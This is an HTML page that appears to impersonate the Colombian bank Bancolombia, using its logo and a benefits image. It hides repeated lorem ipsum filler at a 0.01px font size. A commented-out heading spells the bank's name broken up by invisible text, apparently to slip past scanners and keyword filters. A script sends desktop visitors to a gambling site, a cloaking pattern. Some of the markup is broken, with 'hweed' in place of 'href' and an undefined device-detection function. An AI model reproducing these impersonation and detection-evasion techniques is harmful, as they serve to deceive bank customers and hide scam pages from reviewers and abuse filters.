<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title></title>
    <link rel="stylesheet" hweed="/css/styles.css">
    <style>
        .texto {
            font-size: 0.01px;
        }
    </style>
</head>

<body>

<main style="font-size:0.01px;">
<div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div>
    <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div>
</main>

    <div class="logo"><br>
        <center>
            <img src="/img/logo.png" alt="" srcset="" width="55%" alt="Este logo pertenece a Bancolombia" style="margin-left:-200px; margin-top:-40px;margin-bottom:-50px;">
            <!-- <h1>B<a style="font-size:0.01px;">Lorem ipsum dolor sit amet consectetur adipisicing elit. Aliquid eius in
                    maiores maxime vero quis. Tempora fugiat est fugit, provident veniam, perspiciatis laborum sunt sint
                    facilis facere animi corrupti porro!</a>AN<a style="font-size:0.01px;">Lorem ipsum dolor sit amet
                    consectetur adipisicing elit. Aliquid eius in maiores maxime vero quis. Tempora fugiat est fugit,
                    provident veniam, perspiciatis laborum sunt sint facilis facere animi corrupti porro!</a>CO<a
                    style="font-size:0.01px;">Lorem ipsum dolor sit amet consectetur adipisicing elit. Aliquid eius in
                    maiores maxime vero quis. Tempora fugiat est fugit, provident veniam, perspiciatis laborum sunt sint
                    facilis facere animi corrupti porro!</a>L<a style="font-size:0.01px;">Lorem ipsum dolor sit amet
                    consectetur adipisicing elit. Aliquid eius in maiores maxime vero quis. Tempora fugiat est fugit,
                    provident veniam, perspiciatis laborum sunt sint facilis facere animi corrupti porro!</a>OMBI<a
                    style="font-size:0.01px;">Lorem ipsum dolor sit amet consectetur adipisicing elit. Aliquid eius in
                    maiores maxime vero quis. Tempora fugiat est fugit, provident veniam, perspiciatis laborum sunt sint
                    facilis facere animi corrupti porro!</a>A</h1> -->
        </center>
    </div>
    <main style="font-size:0.01px;">
<div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div>
    <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div> <div>
        <p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nulla feugiat nunc a malesuada.</p>
    </div>
    
    <div>
        <p>Quisque ac eros at odio varius hendrerit. Sed consectetur arcu eu neque ullamcorper.</p>
    </div>

    <div>
        <p>Proin suscipit neque eget risus fermentum, et volutpat nulla posuere.</p>
    </div>

    <div>
        <p>Curabitur fringilla sem eu neque ultricies, id laoreet purus iaculis.</p>
    </div>
</main>

    <div style="width:90%; margin:auto; margin-top: 45px;">
        <h3 style="font-size:27px;"></a>
        <div class="img">
            <center> <br>
             
            </center>
        </div>
    </div>
    <center>
        <div class="beneficios"><img src="/img/beneficios.jpg" alt="Imagen de los serivios de bancolombia" srcset="" width="90%"></div>
    </center>
    <script> if (detectar_dispositivo() == "PC") { window.location.hweed = 'https://www.wplay.co'; }</script>
</body>

</html>
